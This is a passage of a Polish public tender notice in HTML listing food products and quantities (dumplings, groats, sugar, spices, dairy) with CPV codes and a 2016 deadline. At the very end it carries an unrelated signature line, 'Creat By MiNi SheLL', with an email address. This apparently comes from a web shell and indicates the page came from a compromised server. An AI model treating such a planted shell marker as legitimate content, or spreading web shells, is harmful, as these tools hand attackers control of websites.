11	Pierogi z kapustą i grzybami 450g	10 kg
12	Pierogi z mięsem 450g	10 kg
13	Pierogi z serem 450g	10 kg
14	Pyzy z mięsem 450g	10 kg
15	Pyzy ziemniaczane 450g	10 kg
16	Szpinak 450g 	10 kg
17	Truskawka	450g10 kg
18	Wiśnia 450g	10 kg
19	Flaki wołowe 900 g	10 szt
20     Ryba dorsz                50 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.99.70.00-5, 15.22.10.00-3, 15.23.40.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ   V  -   RÓŻNE  ARTYKUŁY  ŻYWNOŚCIOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przewidywana częstotliwość dostaw 1 - 2  razy w tygodniu nie później niż  do godz. 8.30 rano
2.	Wykonawca musi wykazywać dyspozycyjność w każdym dniu roboczym.  Zamawiający nie będzie dostosowywał terminów dostaw do możliwości logistycznych i dystrybucyjnych Wykonawcy.
3.	Szczegóły dotyczące ilości i asortymentu dostaw jednostkowych, ustalane  będą na podstawie jadłospisów tygodniowych,  tworzonych na  bieżąco, według  potrzeb Zamawiającego.
4.	Produkty winne być świeże, w pierwszym gatunku,  zgodne z obowiązującymi normami.
5.	Zamawiający wymaga, aby dostarczone produkty w dniu dostawy posiadały termin przydatności do spożycia  nie krótszy niż 3/4 terminu liczonego  od dnia wyprodukowania, oznaczonego przez producenta na dostarczonym artykule.


Lp.	Opis przedmiotu zamówienia	Ilość 
1	Ananasy puszka 565 g	20 szt
2	Cukier waniliowy 20 g	100 szt
3	Proszek do pieczenia 30 g	100 szt
4	Baton czekoladowy 45 g	400 szt
5	Baton czekoladowy 43 g 	400 szt
6	Batonik czekoladowy wafel 43 g	400 szt
7	Bułka tarta	600 szt
8	Bułka świeża /10 dkg/	200 szt
9	Bazylia  10 g	30 szt
10	Tymianek  10 g	30 szt
11	Papryka słodka10g	30 szt
12	Przyprawa do kurczaka 20 g	30 szt
13	Cukierki czekoladowe 	5 kg
14	Sezamki	800 szt
15	Biszkopty  z galaretką w polewie 147g	400 szt
16	Brzoskwinie w puszce połówki 820 g	10 szt
17	Kwasek cytrynowy  20g	700 szt
18	Kisiel b/cukru 58g	1000 szt 
19	Koncentrat pom.	600 szt
20	Kasza gryczana0,5	200 kg
21	Kasza jaglana0,5kg	200 kg
22	Kasza jęczmienna	200 kg
23	Kasza jęzmienna średnia 1kg 	50 szt
24	Kasza manna 1kg	10 kg
25	Kasza kuskus	200 kg
26	Woda  0,5l	1000 szt
27	Mąka pszenna 1kg	2000 kg
28	Makarony różne /0,5kg/ 	900 kg
29	Makaron kolorowy 0,4 kg	500 kg
30	Makaron spaghetti   kolorowy 	 500 kg
31	Ryż kg	100 kg
32	Ryż brązowy kg	100 kg
33	Cukier  kg	1100 kg
34	Cukier puder 400g	10 kg
35	Cukier waniliowy 32g	100 szt
36	Sos spaghetti słoik 350g	30 szt
37	Sosy do sałatek10g	30 szt
38	Chrzan tarty 290g	10 szt
39	Drożdże 100g	20 szt
40	Tuńczyk w sosie własnym 170g	10 szt
41	Mąka ziemniaczana0,5kg	5 kg
42	Groszek konserwowy 350g	30 szt
43	Masło roślinne 0,5kg	300 szt
44	Majeranek 10g	600 szt
45	Czekolada mleczna 100 g	600 szt
46	Olej jadalny 1 litr	300 szt
47	Przyprawa do mięs75g	200 szt
48	Smalec wp.kostka 200g	1600 szt
49	Sól jadalna jodowana 1 kg	500 kg
50	Czosnek granulowany 20g	30 szt
51	Warzywko przyprawa 200g	300 szt
52	Żelatyna 50 g	5 szt
53	Dżem niskosłodzony 280	900 szt
54	Fasola 400g	100 szt
55	Galaretki różne 79g	50 szt
56	Groch  400g	80 szt
57	Groszek konserwowy  400g	30 szt
58	Herbata expresowa 100 szt  x 2g	10 szt
59	Batony czekoladowe/50g/	1000 szt
60	Lizak/10g/	1000 szt
61	Pieprz naturalny  /20g/	300 szt
62	Wafle w polewie czekoladowej 48g	1000 szt
63	Liście laurowe 10g	100 szt
64	Ser biały tłusty kg	200 kg
65	Ser żółty kg 	50 kg
66	Serek homogenizowany 140g	600 szt
67	Serek topiony bloczki  100g	20 szt
68	Ser feta 0,3	3 kg
69	Jogurt owocowy 150g	1000 szt
70	Jogurt naturalny 340g	1000 szt
71	Śmietana 18%0,5l	800 szt 
72	Mleko 3,2% 1 l.	300 l
73	Kakao 100g	5 szt
74	Musztarda 180g	10 szt
75	Ketchup 500g	10 szt
76	Ogórki konserwowe 0,9l	10 szt
77	Czosnek główka	10 szt
78	Czosnek granulowany 10g	30 szt
79	Kukurydza w puszce 400g	30 szt
80	Fasolka konserwowa czerwona 450g	30 szt
81	Majonez stołowy 900ml	10 szt
82	Pieprz czarny mielony20g	300 szt
83	Pieprz ziarnisty 20g	20 szt
84	Rodzynki 100 g	10 szt
85	Szczaw konserwowy 900g	50 szt
86	Wafle suche 	5 szt
87	Ziele ang.w ziarnach  14g	30 szt
88	Zioła prowansalskie 10g	30 szt
89	Groszek ptysiowy 150g	50 szt
90	Miód pszczeli 1 l	20 szt
91	Woda mineralna 5 l	50 szt
92	Woda mineralna 1,5 l	200 szt
93	Woda mineralna 0,5 l	500 szt
94	Kasza pęczak 1 kg	30 szt
95	Oliwa z oliwek 1 l	10 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com